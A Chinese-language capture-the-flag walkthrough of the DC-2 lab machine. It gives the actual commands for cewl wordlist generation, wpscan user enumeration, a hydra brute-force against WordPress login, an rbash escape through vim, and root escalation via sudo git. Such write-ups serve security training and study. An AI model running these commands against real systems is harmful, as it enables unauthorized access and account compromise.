DC-2
DC-2
发现靶机iparp-scan -l
访问发现找不到host,这里先添加host
web端成功访问,开始渗透之路
信息收集
开了一个80。7744端口,wordpress组件 ,ssh改到7744端口上了,那就直接考虑对wordpress进行渗透吧
web打点
生成字典
访问/flag,发现需要爆破,同时使用cewl
cewl是一个ruby应用,爬行指定url的指定深度。也可以跟一个外部链接,结果会返回一个单词列表,这个列表可以扔到工具里进行密码破解。
所以我们先使用cewl爬取网页上的词
cewl http://dc-2/ -w dict.txt
再使用wpscan进行扫描
wpscan --url http://dc-2 --enumerate u
直接就找到了三个用户名,将三个用户名写入txt中,用hydra爆破
爆破
wordpress的默认后台在
由于kali linux里面的burp是社区版,爆破太慢了,直接用hydra爆了
hydra -L /root/桌面/username.txt -P /root/桌面/dict.txt dc-2 http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
爆出来两个账户名密码,登陆
发现flag2
文件上传
发现有个文件上传点,尝试一波
MIME类型检测,改一改
直接没给写权限,尴尬了,换思路了
ssh连接
找不到什么可以利用的点,试试用刚刚的账户密码,登陆ssh试试
用tom的账号登陆成功了,但是是rbash,很多命令不能用。
看看能用哪些命令
ls发现flag3就在当前目录下,直接vim
看意思是要rbash逃逸
rbash逃逸
检查一遍,/不能用,不能连接ssh的时候逃逸了,尝试用vim
i进入编辑模式后,输入
:set shell=/bin/bash
再输入
:shell
找到第四个flag
看着提示需要git提权,找下怎么提权的
git提权
此时发现tom用户无git命令,切换到jerry用户下
先添加环境变量
echo $PATH
export PATH=$PATH:/bin:/usr/bin
成功切换到jerry下
sudo git help config
!/bin/sh
提权成功
最后的flag在root目录下
总结
- rbash逃逸
- git提权
- cewl爬取